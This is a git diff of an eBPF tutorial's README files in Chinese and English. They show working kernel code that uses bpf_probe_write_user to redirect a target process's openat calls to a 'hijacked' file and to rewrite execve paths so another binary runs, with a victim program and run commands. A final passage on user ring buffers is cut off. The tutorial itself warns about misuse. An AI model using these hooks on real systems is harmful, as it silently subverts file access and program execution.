modifying the `openat` system call arguments, all attempts to access a specific sensitive file can be redirected to a backup file or a log file. +2. **Secure Sandbox**: In the early stages of development, it may be desirable to monitor the files accessed by an application. By changing the `openat` calls, the application can be run in a secure sandbox environment where all file operations are redirected to an isolated file system path. +3. **Sensitive Data Protection**: For files containing sensitive information, such as a configuration file that contains database passwords, a eBPF-based system can redirect those calls to an encrypted or temporary location to enhance data security. -如果该技术被恶意软件利用,攻击者可以重定向文件操作,导致数据泄漏或者破坏数据完整性。例如,程序写入日志文件时,攻击者可能将数据重定向到控制的文件中,干扰审计跟踪。 +If leveraged by malicious software, this technique can be used to redirect file operations resulting in data leaks or compromise data integrity. For example, when a program is writing to a log file, an attacker could redirect the data to a controlled file, disrupting the audit trail. -内核态代码(部分,完整内容请参考 Github bpf-developer-tutorial): +Kernel code (partial code, see complete code on Github bpf-developer-tutorial): ```c SEC("tracepoint/syscalls/sys_enter_openat") @@ -42,22 +42,22 @@ int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter *ctx } ``` -分析内核态代码: +Analysis of the kernel code: -- `bpf_get_current_pid_tgid()` 获取当前进程ID。 -- 如果指定了 `target_pid` 并且不匹配当前进程ID,函数直接返回。 -- 我们创建一个 `args_t` 结构来存储文件名和标志。 -- 使用 `bpf_probe_write_user` 修改用户空间内存中的文件名为 "hijacked"。 +- `bpf_get_current_pid_tgid()` retrieves the current process ID. +- If `target_pid` is specified and does not match the current process ID, the function returns 0 and does not execute further. +- We create an `args_t` structure to store the file name and flags. +- We use `bpf_probe_write_user` to modify the file name in the user space memory to "hijacked". -eunomia-bpf 是一个开源的 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 +The `eunomia-bpf` is an open-source eBPF dynamic loading runtime and development toolchain aimed at making eBPF program development, building, distribution, and execution easier. You can refer to or for installing ecc compiler toolchain and ecli runtime. We will use `eunomia-bpf` to compile and run this example. -编译: +Compile the code: ```bash ./ecc open_modify.bpf.c open_modify.h ``` -使用 make 构建一个简单的 victim 程序,用来测试: +Build a simple victim program using make for testing: ```c int main() @@ -88,7 +88,7 @@ int main() } ``` -测试代码编译并运行: +Compile and run the test code: ```sh $ ./victim @@ -98,13 +98,13 @@ Closing test.txt... test.txt closed ``` -可以使用以下命令指定应修改其 `openat` 系统调用参数的目标进程ID: +Use the following command to specify the target process ID to modify the `openat` system call arguments: ```bash sudo ./ecli run package.json --rewrite --target_pid=$(pidof victim) ``` -然后就会发现输出变成了 world,可以看到我们原先想要打开 "my_test.txt" 文件,但是实际上被劫持打开了 hijacked 文件: +You will see that the output changes to "world". Instead of opening the "my_test.txt" file, it opens the "hijacked" file: ```console test.txt opened, fd=3 @@ -121,11 +121,11 @@ test.txt opened, fd=3 read 5 bytes: world ``` -包含测试用例的完整代码可以在 找到。 +The complete code with test cases can be found in the repository. -## 修改 bash execve 的进程名称 +## Modifying the Process Name of bash `execve` -这段功能用于当 `execve` 系统调用进行时修改执行程序名称。在一些审计或监控场景,这可能用于记录特定进程的行为或修改其行为。然而,此类篡改可能会造成混淆,使得用户或管理员难以确定系统实际执行的程序是什么。最严重的风险是,如果恶意用户能够控制 eBPF 程序,他们可以将合法的系统命令重定向到恶意软件,造成严重的安全威胁。 +This functionality is used to modify the program name when the `execve` system call is made. In certain auditing or monitoring scenarios, this may be used to track the behavior of specific processes or modify their behavior. However, such modifications can lead to confusion and make it difficult for users or administrators to determine the actual program being executed by the system. The most serious risk is that if malicious users are able to control the eBPF program, they could redirect legitimate system commands to malicious software, resulting in a significant security threat. ```c SEC("tp/syscalls/sys_enter_execve") @@ -180,22 +180,20 @@ int handle_execve_enter(struct trace_event_raw_sys_enter *ctx) } ``` -分析内核态代码: +Analysis of the kernel code: -- 执行 `bpf_get_current_pid_tgid` 获取当前进程ID和线程组ID。 -- 如果设置了 `target_ppid`,代码会检查当前进程的父进程ID是否匹配。 -- 读取第一个 `execve` 参数到 `prog_name`,这通常是将要执行的程序的路径。 -- 通过 `bpf_probe_write_user` 重写这个参数,使得系统实际执行的是一个不同的程序。 +- Execute `bpf_get_current_pid_tgid` to get the current process ID and thread group ID. +- If `target_ppid` is set, the code checks if the current process's parent process ID matches. +- Read the program name from the first argument of `execve`. +- Use `bpf_probe_write_user` to overwrite the argument with a hijacked binary path. -这种做法的风险在于它可以被用于劫持软件的行为,导致系统运行恶意代码。同样也可以使用 ecc 和 ecli 编译运行: +This approach poses a risk as it can be leveraged to hijack the behavior of software, resulting in the execution of malicious code on the system. Using ecc and ecli to compile and run: ```bash ./ecc exechijack.bpf.c exechijack.h sudo ./ecli run package.json ``` -## 总结 +## Conclusion -eBPF 提供了强大的能力来实现对正在运行的系统进行实时监控和干预。在合适的监管和安全策略配合下,这可以带来诸多好处,如安全增强、性能优化和运维便利。然而,这项技术的使用必须非常小心,因为错误的操作或滥用可能会对系统的正常运作造成破坏或者引发严重的安全事件。实践中,应确保只有授权用户和程序能够部署和管理 eBPF 程序,并且应当在隔离的测试环境中验证这些eBPF程序的行为,在充分理解其影响后才能将其应用到生产环境中。 - -您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +eBPF provides powerful capabilities for real-time monitoring and intervention in running systems. When used in conjunction with appropriate governance and security policies, this can bring many benefits such as enhanced security, performance optimization, and operational convenience. However, this technology must be used with great care as incorrect operations or misuse can result in system disruption or serious security incidents. In practice, it should be ensured that only authorized users and programs can deploy and manage eBPF programs, and their behavior should be validated in isolated test environments before they are applied in production. diff --git a/src/34-syscall/README.zh.md b/src/34-syscall/README.zh.md new file mode 100644 index 0000000..c2b63ab --- /dev/null +++ b/src/34-syscall/README.zh.md @@ -0,0 +1,201 @@ +# eBPF 开发实践:使用 eBPF 修改系统调用参数 + +eBPF(扩展的伯克利数据包过滤器)是 Linux 内核中的一个强大功能,可以在无需更改内核源代码或重启内核的情况下,运行、加载和更新用户定义的代码。这种功能让 eBPF 在网络和系统性能分析、数据包过滤、安全策略等方面有了广泛的应用。 + +本教程介绍了如何使用 eBPF 修改正在进行的系统调用参数。这种技术可以用作安全审计、系统监视、或甚至恶意行为。然而需要特别注意,篡改系统调用参数可能对系统的稳定性和安全性带来负面影响,因此必须谨慎使用。实现这个功能需要使用到 eBPF 的 `bpf_probe_write_user` 功能,它可以修改用户空间的内存,因此能用来修改系统调用参数,在内核读取用户空间内存之前,将其修改为我们想要的值。 + +本文的完整代码可以在 找到。 + +## 修改 open 系统调用的文件名 + +此功能用于修改 `openat` 系统调用的参数,让它打开一个不同的文件。这个功能可能可以用于: + +1. **文件访问审计**:在对法律合规性和数据安全性有严格要求的环境中,审计员可能需要记录所有对敏感文件的访问行为。通过修改 `openat` 系统调用参数,可以将所有尝试访问某个敏感文件的行为重定向到一个备份文件或者日志文件。 +2. **安全沙盒**:在开发早期阶段,可能希望监控应用程序尝试打开的文件。通过更改 `openat` 调用,可以让应用在一个安全的沙盒环境中运行,所有文件操作都被重定向到一个隔离的文件系统路径。 +3. **敏感数据保护**:对于存储有敏感信息的文件,例如配置文件中包含有数据库密码,一个基于 eBPF 的系统可以将这些调用重定向到一个加密的或暂存的位置,以增强数据安全性。 + +如果该技术被恶意软件利用,攻击者可以重定向文件操作,导致数据泄漏或者破坏数据完整性。例如,程序写入日志文件时,攻击者可能将数据重定向到控制的文件中,干扰审计跟踪。 + +内核态代码(部分,完整内容请参考 Github bpf-developer-tutorial): + +```c +SEC("tracepoint/syscalls/sys_enter_openat") +int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter *ctx) +{ + u64 pid = bpf_get_current_pid_tgid() >> 32; + /* use kernel terminology here for tgid/pid: */ + if (target_pid && pid != target_pid) { + return 0; + } + /* store arg info for later lookup */ + // since we can manually specify the attach process in userspace, + // we don't need to check the process allowed here + + struct args_t args = {}; + args.fname = (const char *)ctx->args[1]; + args.flags = (int)ctx->args[2]; + if (rewrite) { + bpf_probe_write_user((char*)ctx->args[1], "hijacked", 9); + } + bpf_map_update_elem(&start, &pid, &args, 0); + return 0; +} +``` + +分析内核态代码: + +- `bpf_get_current_pid_tgid()` 获取当前进程ID。 +- 如果指定了 `target_pid` 并且不匹配当前进程ID,函数直接返回。 +- 我们创建一个 `args_t` 结构来存储文件名和标志。 +- 使用 `bpf_probe_write_user` 修改用户空间内存中的文件名为 "hijacked"。 + +eunomia-bpf 是一个开源的 eBPF 动态加载运行时和开发工具链,它的目的是简化 eBPF 程序的开发、构建、分发、运行。可以参考 下载和安装 ecc 编译工具链和 ecli 运行时。我们使用 eunomia-bpf 编译运行这个例子。 + +编译: + +```bash +./ecc open_modify.bpf.c open_modify.h +``` + +使用 make 构建一个简单的 victim 程序,用来测试: + +```c +int main() +{ + char filename[100] = "my_test.txt"; + // print pid + int pid = getpid(); + std::cout << "current pid: " << pid << std::endl; + system("echo \"hello\" > my_test.txt"); + system("echo \"world\" >> hijacked"); + while (true) { + std::cout << "Opening my_test.txt" << std::endl; + + int fd = open(filename, O_RDONLY); + assert(fd != -1); + + std::cout << "test.txt opened, fd=" << fd << std::endl; + usleep(1000 * 300); + // print the file content + char buf[100] = {0}; + int ret = read(fd, buf, 5); + std::cout << "read " << ret << " bytes: " << buf << std::endl; + std::cout << "Closing test.txt..." << std::endl; + close(fd); + std::cout << "test.txt closed" << std::endl; + } + return 0; +} +``` + +测试代码编译并运行: + +```sh +$ ./victim +test.txt opened, fd=3 +read 5 bytes: hello +Closing test.txt... +test.txt closed +``` + +可以使用以下命令指定应修改其 `openat` 系统调用参数的目标进程ID: + +```bash +sudo ./ecli run package.json --rewrite --target_pid=$(pidof victim) +``` + +然后就会发现输出变成了 world,可以看到我们原先想要打开 "my_test.txt" 文件,但是实际上被劫持打开了 hijacked 文件: + +```console +test.txt opened, fd=3 +read 5 bytes: hello +Closing test.txt... +test.txt closed +Opening my_test.txt +test.txt opened, fd=3 +read 5 bytes: world +Closing test.txt... +test.txt closed +Opening my_test.txt +test.txt opened, fd=3 +read 5 bytes: world +``` + +包含测试用例的完整代码可以在 找到。 + +## 修改 bash execve 的进程名称 + +这段功能用于当 `execve` 系统调用进行时修改执行程序名称。在一些审计或监控场景,这可能用于记录特定进程的行为或修改其行为。然而,此类篡改可能会造成混淆,使得用户或管理员难以确定系统实际执行的程序是什么。最严重的风险是,如果恶意用户能够控制 eBPF 程序,他们可以将合法的系统命令重定向到恶意软件,造成严重的安全威胁。 + +```c +SEC("tp/syscalls/sys_enter_execve") +int handle_execve_enter(struct trace_event_raw_sys_enter *ctx) +{ + size_t pid_tgid = bpf_get_current_pid_tgid(); + // Check if we're a process of interest + if (target_ppid != 0) { + struct task_struct *task = (struct task_struct *)bpf_get_current_task(); + int ppid = BPF_CORE_READ(task, real_parent, tgid); + if (ppid != target_ppid) { + return 0; + } + } + + // Read in program from first arg of execve + char prog_name[TASK_COMM_LEN]; + char prog_name_orig[TASK_COMM_LEN]; + __builtin_memset(prog_name, '\x00', TASK_COMM_LEN); + bpf_probe_read_user(&prog_name, TASK_COMM_LEN, (void*)ctx->args[0]); + bpf_probe_read_user(&prog_name_orig, TASK_COMM_LEN, (void*)ctx->args[0]); + prog_name[TASK_COMM_LEN-1] = '\x00'; + bpf_printk("[EXECVE_HIJACK] %s\n", prog_name); + + // Program can't be less than out two-char name + if (prog_name[1] == '\x00') { + bpf_printk("[EXECVE_HIJACK] program name too small\n"); + return 0; + } + + // Attempt to overwrite with hijacked binary path + prog_name[0] = '/'; + prog_name[1] = 'a'; + for (int i = 2; i < TASK_COMM_LEN ; i++) { + prog_name[i] = '\x00'; + } + long ret = bpf_probe_write_user((void*)ctx->args[0], &prog_name, 3); + + // Send an event + struct event *e; + e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); + if (e) { + e->success = (ret == 0); + e->pid = (pid_tgid >> 32); + for (int i = 0; i < TASK_COMM_LEN; i++) { + e->comm[i] = prog_name_orig[i]; + } + bpf_ringbuf_submit(e, 0); + } + + return 0; +} +``` + +分析内核态代码: + +- 执行 `bpf_get_current_pid_tgid` 获取当前进程ID和线程组ID。 +- 如果设置了 `target_ppid`,代码会检查当前进程的父进程ID是否匹配。 +- 读取第一个 `execve` 参数到 `prog_name`,这通常是将要执行的程序的路径。 +- 通过 `bpf_probe_write_user` 重写这个参数,使得系统实际执行的是一个不同的程序。 + +这种做法的风险在于它可以被用于劫持软件的行为,导致系统运行恶意代码。同样也可以使用 ecc 和 ecli 编译运行: + +```bash +./ecc exechijack.bpf.c exechijack.h +sudo ./ecli run package.json +``` + +## 总结 + +eBPF 提供了强大的能力来实现对正在运行的系统进行实时监控和干预。在合适的监管和安全策略配合下,这可以带来诸多好处,如安全增强、性能优化和运维便利。然而,这项技术的使用必须非常小心,因为错误的操作或滥用可能会对系统的正常运作造成破坏或者引发严重的安全事件。实践中,应确保只有授权用户和程序能够部署和管理 eBPF 程序,并且应当在隔离的测试环境中验证这些eBPF程序的行为,在充分理解其影响后才能将其应用到生产环境中。 + +您还可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 diff --git a/src/34-syscall/README_en.md b/src/34-syscall/README_en.md deleted file mode 100644 index e64e5f5..0000000 --- a/src/34-syscall/README_en.md +++ /dev/null @@ -1,199 +0,0 @@ -# eBPF Development Practice: Modifying System Call Arguments with eBPF - -eBPF (Extended Berkeley Packet Filter) is a powerful feature in the Linux kernel that allows user-defined code to be run, loaded, and updated without the need to modify kernel source code or reboot the kernel. This functionality has enabled a wide range of applications for eBPF, such as network and system performance analysis, packet filtering, and security policies. - -In this tutorial, we will explore how to use eBPF to modify the arguments of a running system call. This technique can be used for security auditing, system monitoring, or even malicious behavior. However, it is important to note that modifying system call arguments can have negative implications for system stability and security, so caution must be exercised. To implement this functionality, we will use the `bpf_probe_write_user` feature of eBPF, which allows us to modify memory in the user space and therefore modify system call arguments before the kernel reads them from user space. - -The complete code for this tutorial can be found in the repository on GitHub. - -## Modifying the File Name of the `open` System Call - -This functionality is used to modify the arguments of the `openat` system call to open a different file. This technique can be useful for: - -1. **File Access Auditing**: In environments with strict legal and data security requirements, auditors may need to record access to sensitive files. By modifying the `openat` system call arguments, all attempts to access a specific sensitive file can be redirected to a backup file or a log file. -2. **Secure Sandbox**: In the early stages of development, it may be desirable to monitor the files accessed by an application. By changing the `openat` calls, the application can be run in a secure sandbox environment where all file operations are redirected to an isolated file system path. -3. **Sensitive Data Protection**: For files containing sensitive information, such as a configuration file that contains database passwords, a eBPF-based system can redirect those calls to an encrypted or temporary location to enhance data security. - -If leveraged by malicious software, this technique can be used to redirect file operations resulting in data leaks or compromise data integrity. For example, when a program is writing to a log file, an attacker could redirect the data to a controlled file, disrupting the audit trail. - -Kernel code (partial code, see complete code on Github bpf-developer-tutorial): - -```c -SEC("tracepoint/syscalls/sys_enter_openat") -int tracepoint__syscalls__sys_enter_openat(struct trace_event_raw_sys_enter *ctx) -{ - u64 pid = bpf_get_current_pid_tgid() >> 32; - /* use kernel terminology here for tgid/pid: */ - if (target_pid && pid != target_pid) { - return 0; - } - /* store arg info for later lookup */ - // since we can manually specify the attach process in userspace, - // we don't need to check the process allowed here - - struct args_t args = {}; - args.fname = (const char *)ctx->args[1]; - args.flags = (int)ctx->args[2]; - if (rewrite) { - bpf_probe_write_user((char*)ctx->args[1], "hijacked", 9); - } - bpf_map_update_elem(&start, &pid, &args, 0); - return 0; -} -``` - -Analysis of the kernel code: - -- `bpf_get_current_pid_tgid()` retrieves the current process ID. -- If `target_pid` is specified and does not match the current process ID, the function returns 0 and does not execute further. -- We create an `args_t` structure to store the file name and flags. -- We use `bpf_probe_write_user` to modify the file name in the user space memory to "hijacked". - -The `eunomia-bpf` is an open-source eBPF dynamic loading runtime and development toolchain aimed at making eBPF program development, building, distribution, and execution easier. You can refer to or for installing ecc compiler toolchain and ecli runtime. We will use `eunomia-bpf` to compile and run this example. - -Compile the code: - -```bash -./ecc open_modify.bpf.c open_modify.h -``` - -Build a simple victim program using make for testing: - -```c -int main() -{ - char filename[100] = "my_test.txt"; - // print pid - int pid = getpid(); - std::cout << "current pid: " << pid << std::endl; - system("echo \"hello\" > my_test.txt"); - system("echo \"world\" >> hijacked"); - while (true) { - std::cout << "Opening my_test.txt" << std::endl; - - int fd = open(filename, O_RDONLY); - assert(fd != -1); - - std::cout << "test.txt opened, fd=" << fd << std::endl; - usleep(1000 * 300); - // print the file content - char buf[100] = {0}; - int ret = read(fd, buf, 5); - std::cout << "read " << ret << " bytes: " << buf << std::endl; - std::cout << "Closing test.txt..." << std::endl; - close(fd); - std::cout << "test.txt closed" << std::endl; - } - return 0; -} -``` - -Compile and run the test code: - -```sh -$ ./victim -test.txt opened, fd=3 -read 5 bytes: hello -Closing test.txt... -test.txt closed -``` - -Use the following command to specify the target process ID to modify the `openat` system call arguments: - -```bash -sudo ./ecli run package.json --rewrite --target_pid=$(pidof victim) -``` - -You will see that the output changes to "world". Instead of opening the "my_test.txt" file, it opens the "hijacked" file: - -```console -test.txt opened, fd=3 -read 5 bytes: hello -Closing test.txt... -test.txt closed -Opening my_test.txt -test.txt opened, fd=3 -read 5 bytes: world -Closing test.txt... -test.txt closed -Opening my_test.txt -test.txt opened, fd=3 -read 5 bytes: world -``` - -The complete code with test cases can be found in the repository. - -## Modifying the Process Name of bash `execve` - -This functionality is used to modify the program name when the `execve` system call is made. In certain auditing or monitoring scenarios, this may be used to track the behavior of specific processes or modify their behavior. However, such modifications can lead to confusion and make it difficult for users or administrators to determine the actual program being executed by the system. The most serious risk is that if malicious users are able to control the eBPF program, they could redirect legitimate system commands to malicious software, resulting in a significant security threat. - -```c -SEC("tp/syscalls/sys_enter_execve") -int handle_execve_enter(struct trace_event_raw_sys_enter *ctx) -{ - size_t pid_tgid = bpf_get_current_pid_tgid(); - // Check if we're a process of interest - if (target_ppid != 0) { - struct task_struct *task = (struct task_struct *)bpf_get_current_task(); - int ppid = BPF_CORE_READ(task, real_parent, tgid); - if (ppid != target_ppid) { - return 0; - } - } - - // Read in program from first arg of execve - char prog_name[TASK_COMM_LEN]; - char prog_name_orig[TASK_COMM_LEN]; - __builtin_memset(prog_name, '\x00', TASK_COMM_LEN); - bpf_probe_read_user(&prog_name, TASK_COMM_LEN, (void*)ctx->args[0]); - bpf_probe_read_user(&prog_name_orig, TASK_COMM_LEN, (void*)ctx->args[0]); - prog_name[TASK_COMM_LEN-1] = '\x00'; - bpf_printk("[EXECVE_HIJACK] %s\n", prog_name); - - // Program can't be less than out two-char name - if (prog_name[1] == '\x00') { - bpf_printk("[EXECVE_HIJACK] program name too small\n"); - return 0; - } - - // Attempt to overwrite with hijacked binary path - prog_name[0] = '/'; - prog_name[1] = 'a'; - for (int i = 2; i < TASK_COMM_LEN ; i++) { - prog_name[i] = '\x00'; - } - long ret = bpf_probe_write_user((void*)ctx->args[0], &prog_name, 3); - - // Send an event - struct event *e; - e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); - if (e) { - e->success = (ret == 0); - e->pid = (pid_tgid >> 32); - for (int i = 0; i < TASK_COMM_LEN; i++) { - e->comm[i] = prog_name_orig[i]; - } - bpf_ringbuf_submit(e, 0); - } - - return 0; -} -``` - -Analysis of the kernel code: - -- Execute `bpf_get_current_pid_tgid` to get the current process ID and thread group ID. -- If `target_ppid` is set, the code checks if the current process's parent process ID matches. -- Read the program name from the first argument of `execve`. -- Use `bpf_probe_write_user` to overwrite the argument with a hijacked binary path. - -This approach poses a risk as it can be leveraged to hijack the behavior of software, resulting in the execution of malicious code on the system. Using ecc and ecli to compile and run: - -```bash -./ecc exechijack.bpf.c exechijack.h -sudo ./ecli run package.json -``` - -## Conclusion - -eBPF provides powerful capabilities for real-time monitoring and intervention in running systems. When used in conjunction with appropriate governance and security policies, this can bring many benefits such as enhanced security, performance optimization, and operational convenience. However, this technology must be used with great care as incorrect operations or misuse can result in system disruption or serious security incidents. In practice, it should be ensured that only authorized users and programs can deploy and manage eBPF programs, and their behavior should be validated in isolated test environments before they are applied in production. diff --git a/src/35-user-ringbuf/README.md b/src/35-user-ringbuf/README.md index 85affed..769f6b7 100644 --- a/src/35-user-ringbuf/README.md +++ b/src/35-user-ringbuf/README.md @@ -1,42 +1,42 @@ -# eBPF开发实践:使用 user ring buffer 向内核异步发送信息 +# eBPF Development Practices: Asynchronously Send to Kernel with User Ring Buffer -eBPF,即扩展的Berkeley包过滤器(Extended Berkeley Packet Filter),是Linux内核中的一种革命性技术,它允许开发者在内核态中运行自定义的“微程序”,从而在不修改内核代码的情况下改变系统行为或收集系统细粒度的性能数据。 +eBPF, or Extended Berkeley Packet Filter, is a revolutionary technology in the Linux kernel that allows developers to run custom "micro programs" in kernel mode, thereby changing system behavior or collecting fine-grained performance data without modifying kernel code. -eBPF的一个独特之处是它不仅可以在内核态运行程序,从而访问系统底层的状态和资源,同时也可以通过特殊的数据结构与用户态程序进行通信。关于这方面的一个重要概念就是内核态和用户态之间的环形队列——ring buffer。在许多实时或高性能要求的应用中,环形队列是一种常用的数据结构。由于它的FIFO(先进先出)特性,使得数据在生产者和消费者之间可以持续、线性地流动,从而避免了频繁的IO操作和不必要的内存 reallocation开销。 +One unique aspect of eBPF is that it not only allows programs to run in kernel mode to access low-level system states and resources, but it can also communicate with user mode programs through special data structures. One important concept in this regard is the ring buffer between kernel mode and user mode. In many real-time or high-performance applications, the ring buffer is a commonly used data structure. Due to its FIFO (first in, first out) characteristics, data can flow continuously and linearly between the producer and the consumer, avoiding frequent IO operations and unnecessary memory reallocation overhead. -在eBPF中,分别提供了两种环形队列: user ring buffer 和 kernel ring buffer,以实现用户态和内核态之间的高效数据通信。本文是 eBPF 开发者教程的一部分,更详细的内容可以在这里找到: 源代码在 [GitHub 仓库](https://github.com/eunomia-bpf/bpf-developer-tutorial) 中开源。 +In eBPF, two types of ring buffers are provided: user ring buffer and kernel ring buffer, to achieve efficient data communication between user mode and kernel mode. This article is part of the eBPF developer tutorial. More detailed content can be found here: The source code is open source in the . -## 用户态和内核态环形队列—user ring buffer和kernel ring buffer +## User mode and kernel mode ring buffers—user ring buffer and kernel ring buffer -围绕内核态和用户态这两个主要运行级别,eBPF提供了两种相应的环形队列数据结构:用户态环形队列——User ring buffer和内核态环形队列——Kernel ring buffer。 +Around the two main run levels of kernel mode and user mode, eBPF provides two corresponding ring buffer data structures: User ring buffer and Kernel ring buffer. -Kernel ring buffer 则由 eBPF实现,专为Linux内核设计,用于追踪和记录内核日志、性能统计信息等,它的能力是内核态和用户态数据传输的核心,可以从内核态向用户态传送数据。Kernel ring buffer 在 5.7 版本的内核中被引入,目前已经被广泛应用于内核日志系统、性能分析工具等。 +Kernel ring buffer is implemented by eBPF and is specially designed for the Linux kernel to track and record kernel logs, performance statistics, etc. It is the core of data transfer from kernel mode to user mode and can send data from kernel mode to user mode. Kernel ring buffer was introduced in the 5.7 version of the kernel and is now widely used in the kernel logging system, performance analysis tools, etc. -对于内核态往用户态发送应用场景,如内核监控事件的发送、异步通知、状态更新通知等,ring buffer 数据结构都能够胜任。比如,当我们需要监听网络服务程序的大量端口状态时,这些端口的开启、关闭、错误等状态更新就需由内核实时传递到用户空间进行处理。而Linux 内核的日志系统、性能分析工具等,也需要频繁地将大量数据发送到用户空间,以支持用户人性化地展示和分析这些数据。在这些场景中,ring buffer在内核态往用户态发送数据中表现出了极高的效率。 +For scenarios where the kernel sends to user mode, such as sending kernel monitoring events, asynchronous notifications, status update notifications, etc., the ring buffer data structure can handle them. For example, when we need to monitor the status of a large number of ports of network service programs, the opening, closing, errors, and other status updates of these ports need to be real-time transferred to the user space for processing. Linux kernel's logging system, performance analysis tools, etc., also need to frequently send large amounts of data to user space to support user-friendly display and analysis of these data. In these scenarios, the ring buffer shows extremely high efficiency in sending data from the kernel to the user. -User ring buffer 是基于环形缓冲器的一种新型 Map 类型,它提供了单用户空间生产者/单内核消费者的语义。这种环形队列的优点是对异步消息传递提供了优秀的支持,避免了不必要的同步操作,使得内核到用户空间的数据传输可以被优化,并且降低了系统调用的系统开销。User ring buffer 在 6.1 版本的内核中被引入,目前的使用场景相对较少。 +User ring buffer is a new type of Map type based on the ring buffer, it provides the semantics of a single user space producer/single kernel consumer. The advantage of this ring buffer is that it provides excellent support for asynchronous message passing, avoiding unnecessary synchronization operations, optimizing data transfer from the kernel to user space, and reducing the system overhead of system calls. User ring buffer was introduced in the 6.1 version of the kernel and its current use cases are relatively limited. -bpftime 是一个用户空间 eBPF 运行时,允许现有 eBPF 应用程序在非特权用户空间使用相同的库和工具链运行。它为 eBPF 提供了 Uprobe 和 Syscall 跟踪点,与内核 Uprobe 相比,性能有了显著提高,而且无需手动检测代码或重启进程。运行时支持用户空间共享内存中的进程间 eBPF 映射,也兼容内核 eBPF 映射,允许与内核 eBPF 基础架构无缝运行。它包括一个适用于各种架构的高性能 LLVM JIT,以及一个适用于 x86 的轻量级 JIT 和一个解释器。GitHub 地址: +bpftime is a user space eBPF runtime that allows existing eBPF applications to run in unprivileged user space using the same libraries and toolchain. It provides Uprobe and Syscall tracing points for eBPF, which significantly improves performance compared to kernel Uprobe and does not require manual code detection or process restart. The runtime supports process eBPF mapping in user space shared memory, and is also compatible with kernel eBPF mapping, allowing seamless operation with the kernel eBPF infrastructure. It includes a high-performance LLVM JIT for various architectures, a lightweight JIT for x86, and an interpreter. GitHub address: -在 bpftime 中,我们使用 user ring buffer 来实现用户态 eBPF 往内核态 eBPF 发送数据,并更新内核态 eBPF 对应的 maps,让内核态和用户态的 eBPF 一起协同工作。user ring buffer 的异步特性,可以避免系统调用不必要的同步操作,从而提高了内核态和用户态之间的数据传输效率。 +In bpftime, we use the user ring buffer to implement data transmission from user mode eBPF to kernel mode eBPF, and update the maps corresponding to kernel mode eBPF, so that kernel mode and user mode eBPF can work together. The asynchronous characteristics of user ring buffer can avoid unnecessary synchronization operations of system calls, thereby improving the efficiency of data transmission between kernel mode and user mode. -eBPF 的双向环形队列也和 io_uring 在某些方面有相似之处,但它们的设计初衷和应用场景有所不同: +The bi-directional ring buffer of eBPF also has similarities to io_uring in some respects, but their design intentions and use cases are different: -- **设计焦点**:io_uring主要专注于提高异步I/O操作的性能和效率,而eBPF的环形队列更多关注于内核和用户空间之间的数据通信和事件传输。 -- **应用范围**:io_uring主要用于文件I/O和网络I/O的场景,而eBPF的环形队列则更广泛,不限于I/O操作,还包括系统调用跟踪、网络数据包处理等。 -- **灵活性和扩展性**:eBPF提供了更高的灵活性和扩展性,允许用户定义复杂的数据处理逻辑,并在内核态执行。 +- **Design focus**: io_uring primarily focuses on improving the performance and efficiency of asynchronous I/O operations, while eBPF's ring buffer focuses more on data communication and event transmission between the kernel and user space. +- **Application range**: io_uring is mainly used in file I/O and network I/O scenarios, while eBPF's ring buffer is more widespread, not limited to I/O operations, but also including system call tracing, network packet processing, etc. +- **Flexibility and extensibility**: eBPF provides higher flexibility and extensibility, allowing users to define complex data processing logic and execute it in kernel mode. -下面,我们将通过一段代码示例,详细展示如何利用 user ring buffer,实现从用户态向内核传送数据,并以 kernel ring buffer 相应地从内核态向用户态传送数据。 +Following is a code example where we will show in detail how to use user ring buffer to transmit data from user mode to the kernel, and how to respond accordingly with kernel ring buffer to transmit data from kernel mode to user mode. -## 一、实现:在用户态和内核态间使用 ring buffer 传送数据 +## I. Implementation: Using Ring Buffer to Transfer Data Between User Mode and Kernel Mode -借助新的 BPF MAP,我们可以实现在用户态和内核态间通过环形缓冲区传送数据。在这个示例中,我们将详细说明如何在用户空间创建一个 "用户环形缓冲区" (user ring buffer) 并向其写入数据,然后在内核空间中通过 `bpf_user_ringbuf_drain` 函数来消费这些数据。同时,我们也会使用 "内核环形缓冲区" (kernel ring buffer) 来从内核空间反馈数据到用户空间。为此,我们需要在用户空间和内核空间分别创建并操作这两个环形缓冲区。 +With the help of the new BPF MAP, we can implement the transfer of data between user mode and kernel mode through the ring buffer. In this example, we will detail how to create a "user ring buffer" in user space and write data to it and then consume this data in kernel space with the `bpf_user_ringbuf_drain` function. At the same time, we will use the "kernel ring buffer" to feed back data from kernel space to user space. To do this, we need to create and operate these two ring buffers separately in user space and kernel space. -完整的代码可以在 中找到。 +The complete code can be found at . -### 创建环形缓冲区 +### Create Ring Buffer -在内核空间,我们创建了一个类型为 `BPF_MAP_TYPE_USER_RINGBUF` 的 `user_ringbuf`,以及一个类型为 `BPF_MAP_TYPE_RINGBUF` 的 `kernel_ringbuf`。在用户空间,我们创建了一个 `struct ring_buffer_user` 结构体的实例,并通过 `ring_buffer_user__new` 函数和对应的操作来管理这个用户环形缓冲区。 +In kernel mode, we created a `user_ringbuf` of type `BPF_MAP_TYPE_USER_RINGBUF` and a `kernel_ringbuf` of type `BPF_MAP_TYPE_RINGBUF`. In user mode, we created an instance of the `struct ring_buffer_user` structure and managed this user ring buffer through the `ring_buffer_user__new` function and corresponding operations. ```c /* Set up ring buffer polling */ @@ -50,9 +50,9 @@ eBPF 的双向环形队列也和 io_uring 在某些方面有相似之处,但 user_ringbuf = user_ring_buffer__new(bpf_map__fd(skel->maps.user_ringbuf), NULL); ``` -### 编写内核态程序 +### Writing Kernel Mode Programs -我们定义一个 `kill_exit` 的 tracepoint 程序,每当有进程退出时,它会通过 `bpf_user_ringbuf_drain` 函数读取 `user_ringbuf` 中的用户数据,然后通过 `bpf_ringbuf_reserve` 函数在 `kernel_ringbuf` 中创建一个新的记录,并写入相关信息。最后,通过 `bpf_ringbuf_submit` 函数将这个记录提交,使得该记录能够被用户空间读取。 +We define a `kill_exit` tracepoint program that will read user data from `user_ringbuf` with the `bpf_user_ringbuf_drain` function whenever a process exits. Then, it creates a new record in `kernel_ringbuf` with the 